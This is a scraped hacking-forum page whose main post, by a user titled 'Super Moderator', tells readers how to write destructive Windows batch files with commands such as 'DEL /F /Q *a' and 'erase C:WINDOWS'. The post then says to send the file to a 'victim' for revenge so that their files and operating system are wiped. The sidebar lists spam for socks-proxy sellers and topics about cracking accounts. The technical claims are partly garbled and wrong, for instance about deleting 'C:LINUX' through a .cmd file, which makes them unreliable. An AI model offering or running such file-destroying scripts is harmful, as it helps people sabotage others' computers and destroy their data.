Vip-----Munde
Would you like to react to this message? Create an account in a few clicks or log in to continue.

Vip-----Munde

Jai Mata Di

HomeLatest imagesRegisterLog in
Welcome Dear Users Please Make Your First Post In Introdcution Section and Enjoy the forum
Search

Display results as :

Rechercher Advanced Search
Latest topics
» [Vn5socks.net] Auto update 24/7 - Good socks 8h00 PM
How to destory VICTIM pc with a NOTEPAD EmptySat Dec 01, 2018 7:57 pm by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 19h40
How to destory VICTIM pc with a NOTEPAD EmptySat Dec 01, 2018 7:42 pm by shopsocks5.com

» [Vn5socks.net] Auto update 24/7 - Good socks 4h25 PM
How to destory VICTIM pc with a NOTEPAD EmptySat Dec 01, 2018 4:25 pm by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 16h10
How to destory VICTIM pc with a NOTEPAD EmptySat Dec 01, 2018 4:10 pm by shopsocks5.com

» [Vn5socks.net] Auto update 24/7 - Good socks 8h40 AM
How to destory VICTIM pc with a NOTEPAD EmptySat Dec 01, 2018 8:45 am by vn5socks.net

» [Shopsocks5.com] Service Socks5 Cheap - 8h25
How to destory VICTIM pc with a NOTEPAD EmptySat Dec 01, 2018 8:25 am by shopsocks5.com

» [DICHVUSOCKS.US] 12h05 AM UPDATE 24/24- Good Socks
How to destory VICTIM pc with a NOTEPAD EmptySat Dec 01, 2018 12:01 am by dichvusocks

» [DICHVUSOCKS.US] 23h15 PM UPDATE 24/24- Good Socks
How to destory VICTIM pc with a NOTEPAD EmptyFri Nov 30, 2018 11:35 pm by dichvusocks

» [Vn5socks.net] Auto update 24/7 - Good socks 11h35 PM
How to destory VICTIM pc with a NOTEPAD EmptyFri Nov 30, 2018 11:34 pm by vn5socks.net

Top posters
vn5socks.net
How to destory VICTIM pc with a NOTEPAD I_vote_lcapHow to destory VICTIM pc with a NOTEPAD I_voting_barHow to destory VICTIM pc with a NOTEPAD I_vote_rcap 
dichvusocks
How to destory VICTIM pc with a NOTEPAD I_vote_lcapHow to destory VICTIM pc with a NOTEPAD I_voting_barHow to destory VICTIM pc with a NOTEPAD I_vote_rcap 
shopsocks5.com
tisocks
____H-E-A-R-T____
___devils____
***__яiCh_M@N ™__***
™12.-.@.-.j.-.@™
__Tigeя™__
a-x-n
Most active topics
Jokes In Hindi Funny
[Vn5socks.net] Service Seller Socks Good
Scanned Idz for Cracking
28 August 2011
Hotfile Premium Accounts
26 August 2011
30 August 2011
28 August 2011
29 August 2011
Show Your Cracking Hits
Most Viewed Topics
26 april 2012
23 Aug VIP Http
[Shopsocks5.com] Service Socks5 Cheap - 19h50
PROXIES SOCKS PROXY LIST 20h31 PM BY TISOCKS.NET
PROXIES SOCKS PROXY LIST 20h31 PM BY TISOCKS.NET
14 april 2012
28 april 2012
PROXIES SOCKS PROXY LIST 20h25 PM BY TISOCKS.NET
07 nov.2011
28 August 2011
Top posting users this month
No user

How to destory VICTIM pc with a NOTEPAD

Go down 
AuthorMessage
__Dj_-k1ll3r__
Super Moderator
Super Moderator
__Dj_-k1ll3r__

How to destory VICTIM pc with a NOTEPAD Empty
PostSubject: How to destory VICTIM pc with a NOTEPAD   How to destory VICTIM pc with a NOTEPAD EmptyFri Jul 29, 2011 12:49 pm

To delete all folders/files just put this:

DEL /F /Q *a

Into notpad and save it as whateveryouwant.cmd

It will delete all files on the computer even if they are read only and it will not promt you to do it. You will not think any thing has happend untill you try and do something.

WARNING DO NOT CLICK ON IT WHEN YOU HAVE CREATED IT, IT WILL DESTROY YOUR COMPUTER

If you just want to delete the WINDOWS file do this:

The only thing you need again is Notepad.

Now, to test it, create a textfile called TEST.txt in C:

Now in your notepad type "erase C:TEST.txt" (without the quotes). Then do a "Save As..." and save it as "Test.cmd".

Now run the file "Test.cmd" then open up C: and you'll see your Test.txt is gone. Now, the real work begins:

Go to Notpad and type erase C:WINDOWS (or C:LINUX if you have linux) and save it again as whateveryouwant.cmd. Now DON'T run the file or you'll lose your WINDOWS files. So, that's the virus. Now to take revenge. Send you file to your victim. Once she/he opens it. Her/his WINDOWS/LINUX files are gone. And have to install LINUX/WINDOWS again.

Simple explanation:

Go to notepad, type erase C:WINDOWS, save as whateveryouwant.cmd send to victim, once the victim opens it, the WINDOWS file will be gone and have to install WINDOWS again.
Back to top Go down

How to destory VICTIM pc with a NOTEPAD
Page 1 of 1